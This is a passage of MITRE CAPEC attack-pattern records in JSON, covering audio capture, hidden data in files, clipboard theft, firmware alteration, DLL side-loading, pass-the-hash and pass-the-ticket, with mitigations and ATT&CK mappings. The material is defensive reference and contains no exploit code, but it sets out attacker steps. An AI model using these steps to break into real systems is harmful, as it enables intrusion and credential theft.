system.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"651","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]},{"Nature":"ChildOf","CAPEC_ID":"545"}]},"Prerequisites":{"Prerequisite":"Knowledge of the target device\'s or application\u2019s vulnerabilities that can be capitalized on with malicious code. The adversary must be able to place the malicious code on the target device."},"Skills_Required":{"Skill":["To deploy a hidden process or malware on the system to automatically collect audio and video data.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Prevent unknown code from executing on a system through the use of an allowlist policy.","Patch installed applications as soon as new updates become available."]},"Example_Instances":{"Example":["An adversary can capture audio and video, and transmit the recordings to a C2 server or a similar capability.","An adversary can capture and record from audio peripherals in a vehicle via a Car Whisperer attack. If an adversary is within close proximity to a vehicle with Bluetooth capabilities, they may attempt to connect to the hands-free system when it is in pairing mode. With successful authentication, if an authentication system is present at all, an adversary may be able to play music/voice recordings, as well begin a recording and capture conversations happening inside the vehicle. Successful authentication relies on the pairing security key being set to a default value, or by brute force (which may be less practical in an outside environment) Depending on the sensitivity of the information being discussed, this scenario can be extremely compromising.","An adversary may also use a technique called Bluebugging, which is similar to Bluesnarfing but requires the adversary to be between 10-15 meters of the target device. Bluebugging creates a backdoor for an attacker to listen/record phone calls, forward calls, send SMS and retrieve the phonebook."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1123","Entry_Name":"Audio Capture"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1125","Entry_Name":"Video Capture"}]},"References":{"Reference":[{"External_Reference_ID":"REF-653"},{"External_Reference_ID":"REF-654"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, References"}]}},"635":{"ID":"635","Name":"Alternative Execution Due to Deceptive Filenames","Abstraction":"Standard","Status":"Draft","Description":"The extension of a file name is often used in various contexts to determine the application that is used to open and use it. If an attacker can cause an alternative application to be used, it may be able to execute malicious code, cause a denial of service or expose sensitive information.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"165"}},"Prerequisites":{"Prerequisite":"The use of the file must be controlled by the file extension."},"Mitigations":{"Mitigation":"Applications should insure that the content of the file is consistent with format it is expecting, and not depend solely on the file extension."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"162"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"}}},"636":{"ID":"636","Name":"Hiding Malicious Data or Code within Files","Abstraction":"Standard","Status":"Draft","Description":"Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"165"}},"Prerequisites":{"Prerequisite":"The operating system must support a file system that allows for alternate data storage for a file."},"Mitigations":{"Mitigation":"Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools."},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1001.002","Entry_Name":"Data Obfuscation:Steganography"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1218.001","Entry_Name":"Signed Binary Proxy Execution:Compiled HTML File"}]},"References":{"Reference":{"External_Reference_ID":"REF-493"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"637":{"ID":"637","Name":"Collect Data from Clipboard","Abstraction":"Detailed","Status":"Stable","Description":"The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which they are unauthorized.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"150","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find an application that allows copying sensititve data to clipboad] An adversary first needs to find an application that allows copying and pasting of sensitive information. This could be an application that prints out temporary passwords to the screen, private email addresses, or any other sensitive information or data"},{"Step":"2","Phase":"Experiment","Description":"[Target users of the application] An adversary will target users of the application in order to obtain the information in their clipboard on a periodic basic","Technique":["Install malware on a user\'s system designed to log clipboard contents periodically","Get the user to click on a malicious link that will bring them to an application to log the contents of the clipboard"]},{"Step":"3","Phase":"Exploit","Description":"[Follow-up attack] Use any sensitive information found to carry out a follow-up attack"}]},"Prerequisites":{"Prerequisite":"The adversary must have a means (i.e., a pre-installed tool or background process) by which to collect data from the clipboard and store it. That is, when the target copies data to the clipboard (e.g., to paste into another application), the adversary needs some means of capturing that data in a third location."},"Skills_Required":{"Skill":["To deploy a hidden process or malware on the system to automatically collect clipboard data.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.","Employ a robust identification and audit/blocking via using an allowlist of applications on your system. Malware may contain the functionality associated with this attack pattern."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1115","Entry_Name":"Clipboard Data"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"638":{"ID":"638","Name":"Altered Component Firmware","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits systems features and/or improperly protected firmware of hardware components, such as Hard Disk Drives (HDD), with the goal of executing malicious code from within the component\'s Master Boot Record (MBR). Conducting this type of attack entails the adversary infecting the target with firmware altering malware, using known tools, and a payload. Once this malware is executed, the MBR is modified to include instructions to execute the payload at desired intervals and when the system is booted up. A successful attack will obtain persistence within the victim system even if the operating system is reinstalled and/or if the component is formatted or has its data erased.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"452"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Select Target] The adversary searches for a suitable target to attack, such as government and/or private industry organizations.","Technique":"Conduct reconnaissance to determine potential targets to exploit."},{"Step":"2","Phase":"Explore","Description":"[Identify Components] After selecting a target, the adversary determines whether a vulnerable component, such as a specific make and model of a HDD, is contained within the target system.","Technique":["[Remote Access Vector] The adversary gains remote access to the target, typically via additional malware, and explores the system to determine hardware components that are being leveraged.","[Physical Access Vector] The adversary intercepts components in transit and determines if the component is vulnerable to attack."]},{"Step":"3","Phase":"Experiment","Description":"[Optional: Create Payload] If not using an already existing payload, the adversary creates their own to be executed at defined intervals and upon system boot processes. This payload may then be tested on the target system or a test system to confirm its functionality."},{"Step":"4","Phase":"Exploit","Description":"[Insert Firmware Altering Malware] Once a vulnerable component has been identified, the adversary leverages known malware tools to infect the component\'s firmware and drop the payload within the component\'s MBR. This allows the adversary to maintain persistence on the target and execute the payload without being detected.","Technique":["The adversary inserts the firmware altering malware on the target component, via the use of known malware tools.","[Physical Access Vector] The adversary then sends the component to its original intended destination, where it will be installed onto a victim system."]}]},"Prerequisites":{"Prerequisite":["Advanced knowledge about the target component\'s firmware","Advanced knowledge about Master Boot Records (MBR)","Advanced knowledge about tools used to insert firmware altering malware.","Advanced knowledge about component shipments to the target organization."]},"Skills_Required":{"Skill":["Ability to access and reverse engineer hardware component firmware.",{"Level":"High"},"Ability to intercept components in transit.",{"Level":"High"},"Ability to create malicious payload to be executed from MBR.",{"Level":"Medium"},"Ability to leverage known malware tools to infect target system and insert firmware altering malware/payload",{"Level":"Low"}]},"Resources_Required":{"Resource":["Manufacturer source code for hardware components.","Malware tools used to insert malware and payload onto target component.","Either remote or physical access to the target component."]},"Indicators":{"Indicator":["Output observed from processes, API calls, or Self-Monitoring, Analysis and Reporting Technology (SMART) may provide insight into malicious modifications of MBRs.","Digital forensics tools may produce output that indicates an attack of this nature has occurred. Examples include unexpected disk partitions and/or unusual strings."]},"Consequences":{"Consequence":[{"Scope":["Authentication","Authorization"],"Impact":["Gain Privileges","Execute Unauthorized Commands","Bypass Protection Mechanism","Hide Activities"]},{"Scope":["Confidentiality","Access Control"],"Impact":["Read Data","Modify Data"]}]},"Mitigations":{"Mitigation":["Leverage hardware components known to not be susceptible to these types of attacks.","Implement hardware RAID infrastructure."]},"Example_Instances":{"Example":"In 2014, the Equation group was observed levering known malware tools to conduct component firmware alteration attacks against hard drives. In total, 12 HDD categories were shown to be vulnerable from manufacturers such as Western Digital, HGST, Samsung, and Seagate. Because of their complexity, only a few victims were targeted by these attacks. [REF-664]"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1542.002","Entry_Name":"Pre-OS Boot:Component Firmware"}},"References":{"Reference":[{"External_Reference_ID":"REF-664"},{"External_Reference_ID":"REF-665"},{"External_Reference_ID":"REF-666"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Mitigations, Prerequisites, References, Resources_Required, Skills_Required, Typical_Severity"}]}},"639":{"ID":"639","Name":"Probe System Files","Abstraction":"Detailed","Status":"Stable","Description":"An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"545","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"An adversary has access to the file system of a system."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":"Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary."},"Example_Instances":{"Example":["Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.","Adversaries may search network shares on computers they have compromised to find files of interest."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"552"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1552.001","Entry_Name":"Unsecured Credentials:Credentials in Files"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1039","Entry_Name":"Data from Network Shared Drive"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-04"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}}},"640":{"ID":"640","Name":"Inclusion of Code in Existing Process","Abstraction":"Detailed","Status":"Stable","Description":"The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process\'s memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, and more.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"251"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target process] The adversary determines a process with sufficient privileges that they wish to include code into.","Technique":["On Windows, use the process explorer\'s security tab to see if a process is running with administror privileges.","On Linux, use the ps command to view running processes and pipe the output to a search for a particular user, or the root user."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt to include simple code with known output] The adversary attempts to include very simple code into the existing process to determine if the code inclusion worked. The code will differ based on the approach used to include code into an existing process."},{"Step":"3","Phase":"Exploit","Description":"[Include arbitrary code into existing process] Once an adversary has determined that including code into the existing process is possible, they will include code for a targeted purpose, such as accessing that process\'s memory."}]},"Prerequisites":{"Prerequisite":"The targeted application fails to verify the integrity of the running process that allows an adversary to execute arbitrary code."},"Skills_Required":{"Skill":["Knowledge of how to load malicious code into the memory space of a running process, as well as the ability to have the running process execute this code. For example, with DLL injection, the adversary must know how to load a DLL into the memory space of another running process, and cause this process to execute the code inside of the DLL.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Execute Unauthorized Commands","Read Data"]}},"Mitigations":{"Mitigation":["Prevent unknown or malicious software from loading through using an allowlist policy.","Properly restrict the location of the software being used.","Leverage security kernel modules providing advanced access control and process restrictions like SELinux.","Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.","Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.","Monitor API calls like SetWindowsHookEx and SetWinEventHook which install hook procedures for Windows.","Monitor processes and command-line arguments for unknown behavior related to code injection."]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1055","Entry_Name":"Process Injection"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.006","Entry_Name":"Hijack Execution Flow:Dynamic Linker Hijacking"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"641":{"ID":"641","Name":"DLL Side-Loading","Abstraction":"Detailed","Status":"Stable","Description":"An adversary places a malicious version of a Dynamic-Link Library (DLL) in the Windows Side-by-Side (WinSxS) directory to trick the operating system into loading this malicious DLL instead of a legitimate DLL. Programs specify the location of the DLLs to load via the use of WinSxS manifests or DLL redirection and if they aren\'t used then Windows searches in a predefined set of directories to locate the file. If the applications improperly specify a required DLL or WinSxS manifests aren\'t explicit about the characteristics of the DLL to be loaded, they can be vulnerable to side-loading.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Prerequisites":{"Prerequisite":"The target must fail to verify the integrity of the DLL before using them."},"Skills_Required":{"Skill":["Trick the operating system in loading a malicious DLL instead of a legitimate DLL.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Execute Unauthorized Commands","Bypass Protection Mechanism"]}},"Mitigations":{"Mitigation":["Prevent unknown DLLs from loading through using an allowlist policy.","Patch installed applications as soon as new updates become available.","Properly restrict the location of the software being used.","Use of sxstrace.exe on Windows as well as manual inspection of the manifests.","Require code signing and avoid using relative paths for resources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"706"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.002","Entry_Name":"Hijack Execution Flow:DLL Side-Loading"}},"References":{"Reference":{"External_Reference_ID":"REF-501"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"}]}},"642":{"ID":"642","Name":"Replace Binaries","Abstraction":"Detailed","Status":"Draft","Description":"Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":"The attacker must be able to place the malicious binary on the target machine."},"Mitigations":{"Mitigation":"Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. Use auditing tools to observe changes to system services."},"Example_Instances":{"Example":["The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.","By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\\\Windows\\\\system32\\\\. This value is set in the registry at HKEY_CURRENT_USER\\\\Control Panel\\\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"732"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.005","Entry_Name":"Hijack Execution Flow:Executable Installer File Permissions Weakness"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow:Service File Permissions Weakness"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Binary planting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-05-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Example_Instances, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"643":{"ID":"643","Name":"Identify Shared Files/Directories on System","Abstraction":"Detailed","Status":"Draft","Description":"An adversary discovers connections between systems by exploiting the target system\'s standard practice of revealing them in searchable, common areas. Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"309"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"545"},{"Nature":"CanPrecede","CAPEC_ID":"165"}]},"Prerequisites":{"Prerequisite":"The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)."},"Skills_Required":{"Skill":["Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\\\\\remote system or net share).",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network."}},"Mitigations":{"Mitigation":"Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"267"},{"CWE_ID":"200"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1135","Entry_Name":"Network Share Discovery"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-07-31"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"644":{"ID":"644","Name":"Use of Captured Hashes (Pass The Hash)","Abstraction":"Detailed","Status":"Stable","Description":"An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential (e.g. userID and password) hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols. When authenticating via LM or NTLM, an authenticating account\'s plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account\'s hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"653"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"165"},{"Nature":"CanPrecede","CAPEC_ID":"549"},{"Nature":"CanPrecede","CAPEC_ID":"545"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Windows credential hash value pairs] The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.","Technique":["An adversary purchases breached Windows credential hash value pairs from the dark web.","An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.","An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.","An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt domain authentication] Try each Windows credential hash value pair until the target grants access.","Technique":"Manually or automatically enter each Windows credential hash value pair through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain"},{"Step":"4","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks."},{"Step":"5","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within domain systems or applications."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain.","The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.","The adversary possesses known Windows credential hash value pairs that exist on the target domain."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A list of known Window credential hash value pairs for the targeted domain."},"Indicators":{"Indicator":["Authentication attempts use credentials that have been used previously by the account in question.","Authentication attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.","Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Monitor system and domain logs for abnormal credential access.","Create a strong password policy and ensure that your system enforces this policy.","Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain."]},"Example_Instances":{"Example":["Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]","Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"836"},{"CWE_ID":"308"},{"CWE_ID":"294"},{"CWE_ID":"308"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1550.002","Entry_Name":"Use Alternate Authentication Material:Pass The Hash"}},"References":{"Reference":[{"External_Reference_ID":"REF-575"},{"External_Reference_ID":"REF-580"},{"External_Reference_ID":"REF-581"},{"External_Reference_ID":"REF-582"},{"External_Reference_ID":"REF-583"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Date":"2018-07-31"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings"}}},"645":{"ID":"645","Name":"Use of Captured Tickets (Pass The Ticket)","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account\'s credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"652"},{"Nature":"CanPrecede","CAPEC_ID":"151"}]},"Prerequisites":{"Prerequisite":["The adversary needs physical access to the victim system.","The use of a third-party credential harvesting tool."]},"Skills_Required":{"Skill":["Determine if Kerberos authentication is used on the server.",{"Level":"Low"},"The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.","Monitor system and domain logs for abnormal access."]},"Example_Instances":{"Example":"Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. 